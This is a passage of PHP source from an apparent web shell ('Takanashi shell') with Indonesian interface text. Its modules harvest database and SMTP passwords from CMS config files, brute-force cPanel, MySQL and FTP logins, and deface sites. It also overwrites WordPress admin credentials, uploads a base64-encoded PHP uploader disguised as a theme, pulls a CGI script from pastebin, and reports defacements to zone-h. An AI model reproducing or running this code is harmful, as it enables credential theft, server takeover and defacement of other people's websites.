1544. $user_cp_url = $user_cp_url['name'];
1545. if($user_cp_url == $ucp) {
1546. $dom = "<a href='http://$dj/' target='_blank'><font color=Yellow>$dj</font></a>";
1547. break;
1548. }
1549. }
1550. }
1551. } else {
1552. $dom = "<font color=red>function is Disable by system</font>";
1553. }
1554. echo "username (<font color=Yellow>$ucp</font>) password (<font color=Yellow>$pcp</font>) domain ($dom)<br>";
1555. }
1556. }
1557. }
1558. }
1559. }
1560. if($i == 0) {
1561. } else {
1562. echo "<br>sukses nyolong ".$i." Cpanel by <font color=Yellow>Takanashi shell.</font>";
1563. }
1564. } else {
1565. echo "<center>
1566. <form method='post'>
1567. USER: <br>
1568. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1569. $_usercp = fopen("/etc/passwd","r");
1570. while($getu = fgets($_usercp)) {
1571. if($getu == '' || !$_usercp) {
1572. echo "<font color=red>Can't read /etc/passwd</font>";
1573. } else {
1574. preg_match_all("/(.*?):x:/", $getu, $u);
1575. foreach($u[1] as $user_cp) {
1576. if(is_dir("/home/$user_cp/public_html")) {
1577. echo "$user_cp\n";
1578. }
1579. }
1580. }
1581. }
1582. echo "</textarea><br>
1583. PASS: <br>
1584. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1585. function cp_pass($dir) {
1586. $pass = "";
1587. $dira = scandir($dir);
1588. foreach($dira as $dirb) {
1589. if(!is_file("$dir/$dirb")) continue;
1590. $ambil = file_get_contents("$dir/$dirb");
1591. if(preg_match("/WordPress/", $ambil)) {
1592. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1593. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1594. $pass .= ambilkata($ambil,"password = '","'")."\n";
1595. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1596. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1597. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1598. $pass .= ambilkata($ambil,'password = "','"')."\n";
1599. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1600. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1601. } elseif(preg_match("/^[client]$/", $ambil)) {
1602. preg_match("/password=(.*?)/", $ambil, $pass1);
1603. if(preg_match('/"/', $pass1[1])) {
1604. $pass1[1] = str_replace('"', "", $pass1[1]);
1605. $pass .= $pass1[1]."\n";
1606. } else {
1607. $pass .= $pass1[1]."\n";
1608. }
1609. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1610. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1611. }
1612. }
1613. echo $pass;
1614. }
1615. $cp_pass = cp_pass($dir);
1616. echo $cp_pass;
1617. echo "</textarea><br>
1618. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1619. </form>
1620. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1621. }
1622. } elseif($_GET['do'] == 'cpftp_auto') {
1623. if($_POST['crack']) {
1624. $usercp = explode("\r\n", $_POST['user_cp']);
1625. $passcp = explode("\r\n", $_POST['pass_cp']);
1626. $i = 0;
1627. foreach($usercp as $ucp) {
1628. foreach($passcp as $pcp) {
1629. if(@mysql_connect('localhost', $ucp, $pcp)) {
1630. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1631. } else {
1632. $_SESSION[$ucp] = "1";
1633. $_SESSION[$pcp] = "1";
1634. if($ucp == '' || $pcp == '') {
1635. //
1636. } else {
1637. echo "[+] username (<font color=Yellow>$ucp</font>) password (<font color=Yellow>$pcp</font>)<br>";
1638. $ftp_conn = ftp_connect($ip);
1639. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1640. if((!$ftp_login) || (!$ftp_conn)) {
1641. echo "[+] <font color=red>Login Gagal</font><br><br>";
1642. } else {
1643. echo "[+] <font color=Yellow>Login Sukses</font><br>";
1644. $fi = htmlspecialchars($_POST['file_deface']);
1645. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1646. if($deface) {
1647. $i++;
1648. echo "[+] <font color=Yellow>Deface Sukses</font><br>";
1649. if(function_exists('posix_getpwuid')) {
1650. $domain_cp = file_get_contents("/etc/named.conf");
1651. if($domain_cp == '') {
1652. echo "[+] <font color=red>domainnya mati ditelan bumi</font><br><br>";
1653. } else {
1654. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1655. foreach($domains_cp[1] as $dj) {
1656. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1657. $user_cp_url = $user_cp_url['name'];
1658. if($user_cp_url == $ucp) {
1659. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1660. break;
1661. }
1662. }
1663. }
1664. } else {
1665. echo "[+] <font color=red>domainnya mati ditelan bumi</font><br><br>";
1666. }
1667. } else {
1668. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1669. }
1670. }
1671. //echo "username (<font color=Yellow>$ucp</font>) password (<font color=Yellow>$pcp</font>)<br>";
1672. }
1673. }
1674. }
1675. }
1676. }
1677. if($i == 0) {
1678. } else {
1679. echo "<br>sukses deface ".$i." Cpanel by <font color=Yellow>Takanashi shell.</font>";
1680. }
1681. } else {
1682. echo "<center>
1683. <form method='post'>
1684. Filename: <br>
1685. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1686. Deface Page: <br>
1687. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1688. USER: <br>
1689. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1690. $_usercp = fopen("/etc/passwd","r");
1691. while($getu = fgets($_usercp)) {
1692. if($getu == '' || !$_usercp) {
1693. echo "<font color=red>Can't read /etc/passwd</font>";
1694. } else {
1695. preg_match_all("/(.*?):x:/", $getu, $u);
1696. foreach($u[1] as $user_cp) {
1697. if(is_dir("/home/$user_cp/public_html")) {
1698. echo "$user_cp\n";
1699. }
1700. }
1701. }
1702. }
1703. echo "</textarea><br>
1704. PASS: <br>
1705. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1706. function cp_pass($dir) {
1707. $pass = "";
1708. $dira = scandir($dir);
1709. foreach($dira as $dirb) {
1710. if(!is_file("$dir/$dirb")) continue;
1711. $ambil = file_get_contents("$dir/$dirb");
1712. if(preg_match("/WordPress/", $ambil)) {
1713. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1714. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1715. $pass .= ambilkata($ambil,"password = '","'")."\n";
1716. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1717. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1718. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1719. $pass .= ambilkata($ambil,'password = "','"')."\n";
1720. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1721. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1722. } elseif(preg_match("/client/", $ambil)) {
1723. preg_match("/password=(.*)/", $ambil, $pass1);
1724. if(preg_match('/"/', $pass1[1])) {
1725. $pass1[1] = str_replace('"', "", $pass1[1]);
1726. $pass .= $pass1[1]."\n";
1727. }
1728. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1729. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1730. }
1731. }
1732. echo $pass;
1733. }
1734. $cp_pass = cp_pass($dir);
1735. echo $cp_pass;
1736. echo "</textarea><br>
1737. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1738. </form>
1739. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1740. }
1741. } elseif($_GET['do'] == 'smtp') {
1742. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1743. function scj($dir) {
1744. $dira = scandir($dir);
1745. foreach($dira as $dirb) {
1746. if(!is_file("$dir/$dirb")) continue;
1747. $ambil = file_get_contents("$dir/$dirb");
1748. $ambil = str_replace("$", "", $ambil);
1749. if(preg_match("/JConfig|joomla/", $ambil)) {
1750. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1751. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1752. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1753. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1754. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1755. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1756. echo "SMTP Host: <font color=Yellow>$smtp_host</font><br>";
1757. echo "SMTP port: <font color=Yellow>$smtp_port</font><br>";
1758. echo "SMTP user: <font color=Yellow>$smtp_user</font><br>";
1759. echo "SMTP pass: <font color=Yellow>$smtp_pass</font><br>";
1760. echo "SMTP auth: <font color=Yellow>$smtp_auth</font><br>";
1761. echo "SMTP secure: <font color=Yellow>$smtp_secure</font><br><br>";
1762. }
1763. }
1764. }
1765. $smpt_hunter = scj($dir);
1766. echo $smpt_hunter;
1767. } elseif($_GET['do'] == 'auto_wp') {
1768. if($_POST['hajar']) {
1769. $title = htmlspecialchars($_POST['new_title']);
1770. $pn_title = str_replace(" ", "-", $title);
1771. if($_POST['cek_edit'] == "Y") {
1772. $script = $_POST['edit_content'];
1773. } else {
1774. $script = $title;
1775. }
1776. $conf = $_POST['config_dir'];
1777. $scan_conf = scandir($conf);
1778. foreach($scan_conf as $file_conf) {
1779. if(!is_file("$conf/$file_conf")) continue;
1780. $config = file_get_contents("$conf/$file_conf");
1781. if(preg_match("/WordPress/", $config)) {
1782. $dbhost = ambilkata($config,"DB_HOST', '","'");
1783. $dbuser = ambilkata($config,"DB_USER', '","'");
1784. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1785. $dbname = ambilkata($config,"DB_NAME', '","'");
1786. $dbprefix = ambilkata($config,"table_prefix = '","'");
1787. $prefix = $dbprefix."posts";
1788. $option = $dbprefix."options";
1789. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1790. $db = mysql_select_db($dbname);
1791. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1792. $result = mysql_fetch_array($q);
1793. $id = $result[ID];
1794. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1795. $result2 = mysql_fetch_array($q2);
1796. $target = $result2[option_value];
1797. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1798. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1799. echo "<div style='margin: 5px auto;'>";
1800. if($target == '') {
1801. echo "URL: <font color=red>error, domainnya mati ditelan bumi</font> -> ";
1802. } else {
1803. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1804. }
1805. if(!$update OR !$conn OR !$db) {
1806. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1807. } else {
1808. echo "<font color=Yellow>sukses di ganti.</font><br>";
1809. }
1810. echo "</div>";
1811. mysql_close($conn);
1812. }
1813. }
1814. } else {
1815. echo "<center>
1816. <h1>Auto Edit Title+Content WordPress</h1>
1817. <form method='post'>
1818. DIR Config: <br>
1819. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1820. Set Title: <br>
1821. <input type='text' name='new_title' value='Hacked by RESIS-07 | GopressXploits' placeholder='New Title'><br><br>
1822. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1823. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1824. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1825. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1826. </form>
1827. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1828. ";
1829. }
1830. } elseif($_GET['do'] == 'zoneh') {
1831. if($_POST['submit']) {
1832. $domain = explode("\r\n", $_POST['url']);
1833. $nick = $_POST['nick'];
1834. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1835. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1836. function zoneh($url,$nick) {
1837. $ch = curl_init("http://www.zone-h.com/notify/single");
1838. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1839. curl_setopt($ch, CURLOPT_POST, true);
1840. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1841. return curl_exec($ch);
1842. curl_close($ch);
1843. }
1844. foreach($domain as $url) {
1845. $zoneh = zoneh($url,$nick);
1846. if(preg_match("/color=\"red\">Oce<\/font><\/li>/i", $zoneh)) {
1847. echo "$url -> <font color=Yellow>Oce</font><br>";
1848. } else {
1849. echo "$url -> <font color=red>Ga oce</font><br>";
1850. }
1851. }
1852. } else {
1853. echo "<center><form method='post'>
1854. <u>Defacer</u>: <br>
1855. <input type='text' name='nick' size='50' value='RESIS-07'><br>
1856. <u>Domains</u>: <br>
1857. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1858. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1859. </form>";
1860. }
1861. echo "</center>";
1862. } elseif($_GET['do'] == 'cgi') {
1863. $cgi_dir = mkdir('idx_cgi', 0755);
1864. $file_cgi = "idx_cgi/cgi.izo";
1865. $isi_htcgi = "AddHandler cgi-script .izo";
1866. $htcgi = fopen(".htaccess", "w");
1867. fwrite($htcgi, $isi_htcgi);
1868. fclose($htcgi);
1869. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1870. $cgi = fopen($file_cgi, "w");
1871. fwrite($cgi, $cgi_script);
1872. fclose($cgi);
1873. chmod($file_cgi, 0755);
1874. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1875. } elseif($_GET['do'] == 'fake_root') {
1876. ob_start();
1877. $cwd = getcwd();
1878. $ambil_user = explode("/", $cwd);
1879. $user = $ambil_user[2];
1880. if($_POST['reverse']) {
1881. $site = explode("\r\n", $_POST['url']);
1882. $file = $_POST['file'];
1883. foreach($site as $url) {
1884. $cek = getsource("$url/~$user/$file");
1885. if(preg_match("/hacked/i", $cek)) {
1886. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=Yellow>Fake Root!</font><br>";
1887. }
1888. }
1889. } else {
1890. echo "<center><form method='post'>
1891. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1892. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1893. Domain: <br>
1894. <textarea style='width: 450px; height: 250px;' name='url'>";
1895. reverse($_SERVER['HTTP_HOST']);
1896. echo "</textarea><br>
1897. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1898. </form><br>
1899. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1900. }
1901. } elseif($_GET['do'] == 'adminer') {
1902. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1903. function adminer($url, $isi) {
1904. $fp = fopen($isi, "w");
1905. $ch = curl_init();
1906. curl_setopt($ch, CURLOPT_URL, $url);
1907. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1908. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1909. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1910. curl_setopt($ch, CURLOPT_FILE, $fp);
1911. return curl_exec($ch);
1912. curl_close($ch);
1913. fclose($fp);
1914. ob_flush();
1915. flush();
1916. }
1917. if(file_exists('adminer.php')) {
1918. echo "<center><font color=Yellow><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1919. } else {
1920. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1921. echo "<center><font color=Yellow><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1922. } else {
1923. echo "<center><font color=red>gagal buat file adminer</font></center>";
1924. }
1925. }
1926. } elseif($_GET['do'] == 'auto_dwp') {
1927. if($_POST['auto_deface_wp']) {
1928. function anucurl($sites) {
1929. $ch = curl_init($sites);
1930. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1931. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1932. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1933. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1934. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1935. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1936. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1937. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1938. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1939. $data = curl_exec($ch);
1940. curl_close($ch);
1941. return $data;
1942. }
1943. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1944. $post = array(
1945. "log" => "$userr",
1946. "pwd" => "$pass",
1947. "rememberme" => "forever",
1948. "wp-submit" => "$wp_submit",
1949. "redirect_to" => "$web",
1950. "testcookie" => "1",
1951. );
1952. $ch = curl_init($cek);
1953. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1954. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1955. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1956. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1957. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1958. curl_setopt($ch, CURLOPT_POST, 1);
1959. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1960. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1961. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1962. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1963. $data = curl_exec($ch);
1964. curl_close($ch);
1965. return $data;
1966. }
1967. $scan = $_POST['link_config'];
1968. $link_config = scandir($scan);
1969. $script = htmlspecialchars($_POST['script']);
1970. $user = "gandatamvan";
1971. $pass = "gandatamvan";
1972. $passx = md5($pass);
1973. foreach($link_config as $dir_config) {
1974. if(!is_file("$scan/$dir_config")) continue;
1975. $config = file_get_contents("$scan/$dir_config");
1976. if(preg_match("/WordPress/", $config)) {
1977. $dbhost = ambilkata($config,"DB_HOST', '","'");
1978. $dbuser = ambilkata($config,"DB_USER', '","'");
1979. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1980. $dbname = ambilkata($config,"DB_NAME', '","'");
1981. $dbprefix = ambilkata($config,"table_prefix = '","'");
1982. $prefix = $dbprefix."users";
1983. $option = $dbprefix."options";
1984. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1985. $db = mysql_select_db($dbname);
1986. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1987. $result = mysql_fetch_array($q);
1988. $id = $result[ID];
1989. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1990. $result2 = mysql_fetch_array($q2);
1991. $target = $result2[option_value];
1992. if($target == '') {
1993. echo "[-] <font color=red>error, domainnya mati ditelan bumi</font><br>";
1994. } else {
1995. echo "[+] $target <br>";
1996. }
1997. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1998. if(!$conn OR !$db OR !$update) {
1999. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2000. mysql_close($conn);
2001. } else {
2002. $site = "$target/wp-login.php";
2003. $site2 = "$target/wp-admin/theme-install.php?upload";
2004. $b1 = anucurl($site2);
2005. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2006. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2007. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2008. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2009. $www = "m.php";
2010. $fp5 = fopen($www,"w");
2011. fputs($fp5,$upload3);
2012. $post2 = array(
2013. "_wpnonce" => "$anu2",
2014. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2015. "themezip" => "@$www",
2016. "install-theme-submit" => "Install Now",
2017. );
2018. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2019. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2020. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2021. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2022. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2023. curl_setopt($ch, CURLOPT_POST, 1);
2024. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2025. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2026. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2027. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2028. $data3 = curl_exec($ch);
2029. curl_close($ch);
2030. $y = date("Y");
2031. $m = date("m");
2032. $namafile = "id.php";
2033. $fpi = fopen($namafile,"w");
2034. fputs($fpi,$script);
2035. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2036. curl_setopt($ch6, CURLOPT_POST, true);
2037. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2038. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2039. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2040. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2041. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2042. $postResult = curl_exec($ch6);
2043. curl_close($ch6);
2044. $as = "$target/k.php";
2045. $bs = anucurl($as);
2046. if(preg_match("#$script#is", $bs)) {
2047. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2048. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2049. } else {
2050. echo "[-] <font color='red'>gagal mepes...</font><br>";
2051. echo "[!!] coba aja manual: <br>";
2052. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2053. echo "[+] username: <font color=Yellow>$user</font><br>";
2054. echo "[+] password: <font color=Yellow>$pass</font><br><br>";
2055. }
2056. mysql_close($conn);
2057. }
2058. }
2059. }
2060. } else {
2061. echo "<center><h1>WordPress Auto Deface</h1>
2062. <form method='post'>
2063. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2064. <input type='text' name='script' height='10' size='50' placeholder='Hacked by RESIS-07 | GopressXploits' required><br>
2065. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2066. </form>
2067. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2068. </center>";
2069. }
2070. } elseif($_GET['do'] == 'auto_dwp2') {
2071. if($_POST['auto_deface_wp']) {
2072. function anucurl($sites) {
2073. $ch = curl_init($sites);
2074. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2075. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2076. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2077. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2078. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2079. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2080. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2081. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2082. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2083. $data = curl_exec($ch);
2084. curl_close($ch);
2085. return $data;
2086. }
2087. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2088. $post = array(
2089. "log" => "$userr",
2090. "pwd" => "$pass",
2091. "rememberme" => "forever",
2092. "wp-submit" => "$wp_submit",
2093. "redirect_to" => "$web",
2094. "testcookie" => "1",
2095. );
2096. $ch = curl_init($cek);
2097. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2098. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2099. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2100. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2101. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2102. curl_setopt($ch, CURLOPT_POST, 1);
2103. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2104. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2105. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2106. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2107. $data = curl_exec($ch);
2108. curl_close($ch);
2109. return $data;
2110. }
2111. $link = explode("\r\n", $_POST['link']);
2112. $script = htmlspecialchars($_POST['script']);
2113. $user = "gandatamvan";
2114. $pass = "gandatamvan";
2115. $passx = md5($pass);
2116. foreach($link as $dir_config) {
2117. $config = anucurl($dir_config);
2118. $dbhost = ambilkata($config,"DB_HOST', '","'");
2119. $dbuser = ambilkata($config,"DB_USER', '","'");
2120. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2121. $dbname = ambilkata($config,"DB_NAME', '","'");
2122. $dbprefix = ambilkata($config,"table_prefix = '","'");
2123. $prefix = $dbprefix."users";
2124. $option = $dbprefix."options";
2125. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2126. $db = mysql_select_db($dbname);
2127. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2128. $result = mysql_fetch_array($q);
2129. $id = $result[ID];
2130. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2131. $result2 = mysql_fetch_array($q2);
2132. $target = $result2[option_value];
2133. if($target == '') {
2134. echo "[-] <font color=red>error, domainnya mati ditelan bumi</font><br>";
2135. } else {
2136. echo "[+] $target <br>";
2137. }
2138. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2139. if(!$conn OR !$db OR !$update) {
2140. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2141. mysql_close($conn);
2142. } else {
2143. $site = "$target/wp-login.php";
2144. $site2 = "$target/wp-admin/theme-install.php?upload";
2145. $b1 = anucurl($site2);
2146. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2147. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2148. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2149. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2150. $www = "m.php";
2151. $fp5 = fopen($www,"w");
2152. fputs($fp5,$upload3);
2153. $post2 = array(
2154. "_wpnonce" => "$anu2",
2155. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2156. "themezip" => "@$www",
2157. "install-theme-submit" => "Install Now",
2158. );
2159. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2160. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2161. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2162. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2163. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2164. curl_setopt($ch, CURLOPT_POST, 1);
